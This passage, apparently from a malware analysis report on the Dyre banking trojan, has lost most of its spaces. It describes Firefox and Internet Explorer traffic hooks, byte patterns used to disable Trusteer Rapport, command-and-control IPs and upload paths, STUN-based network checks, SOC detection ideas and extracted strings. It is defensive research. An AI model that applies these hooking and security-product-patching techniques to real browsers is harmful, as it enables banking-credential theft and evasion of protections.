0FCC20002hChromePEParsingfailed 0FCC20000hUnknownChromerelated 0FCC10001hFireFoxHookfailed 0FCC10000hUnknownFireFoxrelated 0FCCC0001hInternetExplorerWinInethookfailed 0FCCC0000hInternetExplorerWinInetparsingfailedortimestampnotfound

Hooks Processspecifichooksforloggingbrowsertraffic.Thehookshappeninstage7whichhappensintheinjectedprocess.Theinjectedprocessnamewillbefirefox.exe,chrome.exeoriexplore.exe.

FireFox Hooks ThesampleusesthestandardapproachtohooktrafficinFirefox.ItattemptstoloadNSPR4.DLLorNSS3.DLL.ItwillthencallGetProcAddresstogettheaddressandthenaddaninlinehookforthefollowingAPIs.

PR_Read PR_Write PR_Close

ParsesthebelowrequestifPR_Writeiscalled GET PUT POST

ParsesthebelowrequestifPR_Readiscalled HTTP HTTPS POST

ThehookingofPR_ReadandPR_WritehasbeenusedbymalwaresinceatleastDecemberof2009.LikelyearlierduetothefirstpostdiscussingthistechniquewasbyausernamedoxmanontheMozillaforumsinJanuaryof2007.

Internet Explorer Hooks ThefirsttwohooksuseaGetProcAddressapproachtofindtheaddressLoadLibraryExWandCreateProcessInternalW.WhenhookingWinInet.dllDyredoessomethingratherunique.Itdoesthistobypassheuristicbaseddetection.DyrewillreadthetimestampofWinInet.dllandthencompareittoalistofothertimestampsforWinInet.dll.ThelistcontainseverytimestampforWinInet.dllsince'2004080401:53:22'to'2014072504:04:59'.seg000:00A0C05F db 0seg000:00A0C060TimeStampListdd4110941Bh DATAXREF:TimeStamp:_looprseg000:00A0C064dword_A0C064dd0 DATAXREF:TimeStamp+1Crseg000:00A0C064 TimeStamp:loc_A07A0Dr...seg000:00A0C068 dd411095F2h

seg000:00A0D234 dd78hseg000:00A0D238 dd53860FB3hseg000:00A0D23C dd79hseg000:00A0D240 dd53D22BCBhseg000:00A0D244 dd7Ah>>>datetime.datetime.fromtimestamp(0x411095F2).strftime('%Y%m%d%H:%M:%S')'2004080401:53:22'>>>datetime.datetime.fromtimestamp(0x53D22BCB).strftime('%Y%m%d%H:%M:%S')'2014072504:04:59' Ifanerroroccursduringtheparsingprocessthesamplewillcheckifthehashofthedllisknowntotheserver.Ifnot,itwillusethe"sfile"commandtosendthefilebacktothecommandandcontrol.'/%s/%s/63/file/%s/%s/%s/'"Checkwininet.dllonserverfailed""Sendwininet.dllfailed"Ifthetimestampisfoundthevaluebelowisusedasanindextograbtheaddressofwherethehookshouldhappen.Forexampleifthetimestampwas4802A13Ahitwouldbefoundatthe49thentry.seg000:00A0C1E8 dd4802A13Ah

77200F3B 90 NOP 77200F3CE9C7F0398A JMP015A0008

Anti-Detection functionality Thefirststageisrandomizedandtypicallyhasalowdetectionscore ProcessinjectionofaDLLthatisnotlistedasaloadedmodule. Disabling/PatchingofTrusteerintheinjectedprocess.Thishappensinstage7.

Pleaseseebelowformoredetails.

Disabling RapportGP ChecksifRapportGP.dllisaloadedmodulewithinthebrowser.Iffounditsearchesforasetofbytesandthenpatchesit.Thetwobytepatternsandthereplacedbytescanbefoundbelow.FirstBytesSearchedseg000:00A0C0008BC6 mov eax,esiseg000:00A0C0028B4C2450 mov ecx,[esp+50h]seg000:00A0C00664890D000000+ mov largefs:0,ecxseg000:00A0C00D59 pop ecxseg000:00A0C00E5F pop ediseg000:00A0C00F5E pop esiseg000:00A0C0105B pop ebxseg000:00A0C0118BE5 mov esp,ebpseg000:00A0C0135D pop ebpseg000:00A0C014C20400 retn 4FirstBytesPatchedseg000:00A0C018seg000:00A0C01831C0 xor eax,eaxseg000:00A0C01A8B4C2450 mov ecx,[esp+arg_4C]seg000:00A0C01E64890D000000+ mov largefs:0,ecxseg000:00A0C02559 pop ecxseg000:00A0C0265F pop ediseg000:00A0C0275E pop esiseg000:00A0C0285B pop ebxseg000:00A0C0298BE5 mov esp,ebpseg000:00A0C02B5D pop ebpseg000:00A0C02CC20400 retn 42ndBytesSearchedseg000:00A0C0308BC6 mov eax,esiseg000:00A0C0328B4C2458 mov ecx,[esp+58h]seg000:00A0C03664890D00+ mov largefs:0,ecxseg000:00A0C03D59 pop ecxseg000:00A0C03E5F pop edi

seg000:00A0C03F5E pop esiseg000:00A0C0405B pop ebxseg000:00A0C0418BE5 mov esp,ebpseg000:00A0C0435D pop ebpseg000:00A0C044C20400 retn 42ndBytesPatchedseg000:00A0C04831C0 xor eax,eaxseg000:00A0C04A8B4C2458 mov ecx,[esp+58h]seg000:00A0C04E64890D00+ mov largefs:0,ecxseg000:00A0C05559 pop ecxseg000:00A0C0565F pop ediseg000:00A0C0575E pop esiseg000:00A0C0585B pop ebxseg000:00A0C0598BE5 mov esp,ebpseg000:00A0C05B5D pop ebpseg000:00A0C05CC20400 retn 4

Command and Control

Third Party Resources abuse.chSSLFingerprintBlacklistforSuricata

https://sslbl.abuse.ch/blacklist/sslblacklist.rules

URLs & IPs ThebelowIPswereextractedfrommemorydumpsfromDyresamples.Thisisasmallset.188.165.209.117:19001

https://www.virustotal.com/en/ipaddress/188.165.209.117/information/188.165.214.17:19000







https://www.virustotal.com/en/ipaddress/94.23.221.154/information/

94.23.236.54:15000

https://www.virustotal.com/en/ipaddress/94.23.236.54/information/

Network Traffic Patterns Whentestingthenetworkconnectionitwillmakearequesttogoogle.comormicrosoft.com.TheinitialURLischosenrandomly.Itwillattempttochecktheconnectionforaminuteandhalf.No. Time Source Destination ProtocolLengthInfo 57203.133562192.168.195.129 74.125.225.164 TCP 62 remoteas>http[SYN]Seq=0Win=64240Len=0MSS=1460SACK_PERM=1 58203.18709274.125.225.164 192.168.195.129 TCP 60 http>remoteas[SYN,ACK]Seq=0Ack=1Win=64240Len=0MSS=1460 59203.188628192.168.195.129 74.125.225.164 TCP 54 remoteas>http[ACK]Seq=1Ack=1Win=64240Len=0 69210.736318192.168.195.129 74.125.225.164 TCP 54 remoteas>http[FIN,ACK]Seq=1Ack=1Win=64240Len=0 70210.74779874.125.225.164 192.168.195.129 TCP 60 http>remoteas[ACK]Seq=1Ack=2Win=64239Len=0 71210.78758374.125.225.164 192.168.195.129 TCP 60 http>remoteas[FIN,PSH,ACK]Seq=1Ack=2Win=64239Len=0 72210.787877192.168.195.129 74.125.225.164 TCP 54 remoteas>http[ACK]Seq=2Ack=2Win=64240Len=0OnceitcanverifythemachinehasaconnectionitwilltrytogetthemachinesIPaddressthrougharequesttoastun(SessionTraversalUtilitiesforNAT)server.Dryewillrandomlychooseoneofthefollowingstunservers.stun1.voiceeclipse.netstun.callwithus.comstun.sipgate.netstun.ekiga.netstun.ideasip.comstun.internetcalls.comstun.noc.amsix.netstun.phonepower.comstun.voip.aebc.comstun.voipbuster.comstun.voxgratia.orgstun.ipshka.comstun.faktortel.com.au

stun.iptel.orgstun.voipstunt.comstunserver.org203.183.172.196:3478s1.taraba.nets2.taraba.netestun.l.google.com:19302stun1.l.google.com:19302stun2.l.google.com:19302stun3.l.google.com:19302stun4.l.google.com:19302stun.schlund.destun.rixtelecom.sestun.voiparound.comnumb.viagenie.castun.stunprotocol.orgstun.2talk.co.nzFromaSOCperspective,rulescouldbecreatedforaDNSrequesttogoogle.comormicrosoft.comandthenaconnectiontooneoftheabovestunservers.Iftheinitialrequestisgoogle.comitwouldbeobviousnottoflagonaconnectiontoagooglehostedstunserver.WhilesearchingforsamplesIfounditraretoseenonmaliciousexecutablesconnecttothenongooglestunservers.IftheattemptofthegettingthemachinesIPfailsusingastunserveritwilluseathirdpartysiteicanhazip.comforreturningtheIPaddress.

Appendix:

Strings

Stage 6 - Dyre [email protected]%s:%d%d/%s/%semptyWin_7Win_7_SP1Win_XPWin_8

Win_8.1Win_Server_2003Win_Vista_SP2Win_VistaWin_Vista_SP1unknown_32bit/%s/%s/0/%s/%d/%s//%s/%s/%d/%s//%s/%s/%d/%s/%s//%s/%s/5/%s/%s/Wget/1.9+cvsstable(RedHatmodified)vnc32httprdc/%s/%s/23/%d/%s/%s/%s/%s/0errornonameRtlTimeToSecondsSince1970text/plaincharset=UTF8text/plaincharset=UTF16image/jpegapplication/octetstreamtext/plain%sbound%dContentDisposition:formdataname="%s"ContentType:%sContentType:multipart/formdataboundary=ContentLength:Accept:text/htmlConnection:KeepAlive%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%s_W%d%d%d.%sbotidsuccess0.0.0.0:0confighttp://icanhazip.comNoNATFullConeNATUDPFirewall

PortrestrictedNATAddressrestrictedNATSymmetricNATunknownNATCONSTRAINT%I64d"profile""info_cache"tablecookiescookiesindexsqlite_autoindex_cookies_1cookiestablemoz_cookiesmoz_cookiesNSS_InitializeNSS_ShutdownPR_InitPR_CleanupPL_ArenaFinishSECITEM_AllocItemSECITEM_DupItemSECITEM_ZfreeItemSEC_PKCS12EnableCipherSEC_PKCS12SetPreferredCipherSEC_PKCS12CreateExportContextSEC_PKCS12DestroyExportContextSEC_PKCS12CreateUnencryptedSafeSEC_PKCS12CreatePasswordPrivSafeSEC_PKCS12AddCertAndKeySEC_PKCS12AddPasswordIntegritySEC_PKCS12EncodeCERT_GetDefaultCertDBCERT_DestroyCertListPORT_UCS2_UTF8ConversionPORT_SetUCS2_ASCIIConversionFunctionPK11_AuthenticatePK11_GetInternalKeySlotPK11_FreeSlotPK11_ListCertsPK11_NeedUserInitPK11_InitPinSEC_PKCS12DecoderStartSEC_PKCS12DecoderUpdateSEC_PKCS12DecoderImportBagsSEC_PKCS12DecoderFinishSEC_PKCS12DecoderVerify

SEC_PKCS12DecoderValidateBags\Mozilla\Firefox\profiles.iniIsRelativesecmod.db%d.%d.%d.%dbrowsnapshotgeneralinfocanotgetconfigbackconnstartfailClientSetModuleVncStartServerVncStopServer222289DD9234C9CA94E3E60D08C77777VNCModuleTVModuleAUTOBACKCONNstartfailedcannotgetVNCcannotgetTVsendbrowsersnapshotfailedsendsysteminfofailedbcsrv1609uk4C~h!f@

google.commicrosoft.comstun1.voiceeclipse.netstun.callwithus.comstun.sipgate.netstun.ekiga.netstun.ideasip.comstun.internetcalls.comstun.noc.amsix.netstun.phonepower.comstun.voip.aebc.comstun.voipbuster.comstun.voxgratia.orgstun.ipshka.comstun.faktortel.com.austun.iptel.orgstun.voipstunt.comstunserver.org203.183.172.196:3478s1.taraba.nets2.taraba.netstun.l.google.com:19302stun1.l.google.com:19302stun2.l.google.com:19302stun3.l.google.com:19302stun4.l.google.com:19302stun.schlund.destun.rixtelecom.sestun.voiparound.comnumb.viagenie.castun.stunprotocol.orgstun.2talk.co.nz*.txt\Google\Chrome\UserData\LocalState%s%hs\Cookies\Mozilla\Firefox\profiles.iniIsRelative\cookies.sqlite12345CurrentVersionSOFTWARE\Mozilla\MozillaFirefox

SOFTWARE\Mozilla\MozillaFirefox\\MainInstallDirectorynss3.dllSOFTWARE\Microsoft\WindowsNT\CurrentVersion\TimeZones\DisplayDisplayNameSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GoogleChromeDisplayVersionVersionMozillaFirefoxsvcVersionSOFTWARE\Microsoft\InternetExplorerInternetExplorer1s3bu472stgdx6dr85du1xdfy2dvSoftware\Microsoft\Windows\CurrentVersion\UninstallSYSTEM\CurrentControlSet\servicesGlobal\553wwerdty7D:P(AGASY)(AGABA)(AGAWD)(AGARC)S:(MLNWLW)chrome.exefirefox.exeiexplore.exe

Stage 7 - Injected Process [email protected]@.reloc9POST=HTTPt=POSTx"tXSV=GETt=PUTt=POSTVWjj=HTTPt

=POST=GETt=PUTt=POSTVWjj9POST=HTTPt=POSTGETtPUTtSSPh@wY0!wLoadLibraryExW/%s/%s/%d/%s//%s/%s/%d/%s/%s/%s/%s/0error/%s/%s/63/checkfile/%s/%s/Wget/1.9+cvsstable(RedHatmodified)/%s/%s/63/file/%s/%s/%s/sfiletext/plaincharset=UTF8text/plaincharset=UTF16image/jpegapplication/octetstreamtext/plain%sbound%dContentDisposition:formdataname="%s"ContentType:%sContentType:multipart/formdataboundary=ContentLength:Accept:text/htmlConnection:KeepAliveContentLength:Host:Connection:TransferEncoding:Cookie:Referer:XCSRFToken:XRequestedWith:ContentType:

NSPR4.DLLNSS3.DLLPR_ReadPR_WritePR_CloseRapportGP.dllCreateProcessInternalWgdm12479s:litemsaddrserverserverlist

0E0N03P3T3chrome.dllkernel32.dll\\.\pipe\cmvn5e4d4rWinInet.dllkernelbase.dlliexplore.exe!test\system32\wininet.dllfirefox.exechrome.exeiexplore.exe

Third Party Analysis http://phishme.com/projectdyrenewratslurpsbankcredentialsbypassesssl http://blog.spiderlabs.com/2014/07/analysisofabankingtrojanspammedbycutwail.h

tml https://techhelplist.com/index.php/spamlist/511sageaccountinginvoicennnvirus http://www.proofpoint.com/threatinsight/posts/dyrezaasaservice.php http://thegoldenmessenger.blogspot.com/2014/07/dyrebankerakacdilakawin32win6

4.html http://www.virusradar.com/en/Win32_Battdil/chart/history http://stopmalvertising.com/malwarereports/analysisofdyrezachangesnetworktraffi

c.html http://blog.trendmicro.com/trendlabssecurityintelligence/acloserlookatdyremalwar

epart1/OldestdiscussiononFireFoxhooking

http://forums.mozillazine.org/viewtopic.php?t=514691

http://www.google.com/url?q=http%3A%2F%2Fphishme.com%2Fproject-dyre-new-rat-slurps-bank-credentials-bypasses-ssl&sa=D&sntz=1&usg=AFQjCNF4cXQ6ErqrS4fEMGboq0l41M6uvwhttp://www.google.com/url?q=http%3A%2F%2Fblog.spiderlabs.com%2F2014%2F07%2Fanalysis-of-a-banking-trojan-spammed-by-cutwail.html&sa=D&sntz=1&usg=AFQjCNF4Ogcu8Fbv4CZDA796-vAnnI-QiAhttp://www.google.com/url?q=http%3A%2F%2Fblog.spiderlabs.com%2F2014%2F07%2Fanalysis-of-a-banking-trojan-spammed-by-cutwail.html&sa=D&sntz=1&usg=AFQjCNF4Ogcu8Fbv4CZDA796-vAnnI-QiAhttps://www.google.com/url?q=https%3A%2F%2Ftechhelplist.com%2Findex.php%2Fspam-list%2F511-sage-accounting-invoice-nnn-virus&sa=D&sntz=1&usg=AFQjCNGWf_PQFJOuAHS3CeVTD8Ogp5cqpghttp://www.google.com/url?q=http%3A%2F%2Fwww.proofpoint.com%2Fthreatinsight%2Fposts%2Fdyreza-as-a-service.php&sa=D&sntz=1&usg=AFQjCNHA92Dd483srE6wFxnC8aUd1vB8-Ahttp://www.google.com/url?q=http%3A%2F%2Fthegoldenmessenger.blogspot.com%2F2014%2F07%2Fdyre-banker-aka-cdil-aka-win32win64.html&sa=D&sntz=1&usg=AFQjCNEOr7WSTZLK9czJPwKzeNFE0ICx4Qhttp://www.google.com/url?q=http%3A%2F%2Fthegoldenmessenger.blogspot.com%2F2014%2F07%2Fdyre-banker-aka-cdil-aka-win32win64.html&sa=D&sntz=1&usg=AFQjCNEOr7WSTZLK9czJPwKzeNFE0ICx4Qhttp://www.google.com/url?q=http%3A%2F%2Fwww.virusradar.com%2Fen%2FWin32_Battdil%2Fchart%2Fhistory&sa=D&sntz=1&usg=AFQjCNG6QBPnNGyGmx8VSylkWGkJ5gacCwhttp://www.google.com/url?q=http%3A%2F%2Fstopmalvertising.com%2Fmalware-reports%2Fanalysis-of-dyreza-changes-network-traffic.html&sa=D&sntz=1&usg=AFQjCNEGEBXgRxUFIQZGJs36t18hf7a17Qhttp://www.google.com/url?q=http%3A%2F%2Fstopmalvertising.com%2Fmalware-reports%2Fanalysis-of-dyreza-changes-network-traffic.html&sa=D&sntz=1&usg=AFQjCNEGEBXgRxUFIQZGJs36t18hf7a17Qhttp://www.google.com/url?q=http%3A%2F%2Fblog.trendmicro.com%2Ftrendlabs-security-intelligence%2Fa-closer-look-at-dyre-malware-part-1%2F&sa=D&sntz=1&usg=AFQjCNEL3tLLaZqmvAoDvAxXVtxKUlOg_whttp://www.google.com/url?q=http%3A%2F%2Fblog.trendmicro.com%2Ftrendlabs-security-intelligence%2Fa-closer-look-at-dyre-malware-part-1%2F&sa=D&sntz=1&usg=AFQjCNEL3tLLaZqmvAoDvAxXVtxKUlOg_whttp://www.google.com/url?q=http%3A%2F%2Fforums.mozillazine.org%2Fviewtopic.php%3Ft%3D514691&sa=D&sntz=1&usg=AFQjCNHyKrA2CCgKaEe_vEjT5ZjFAVlpkA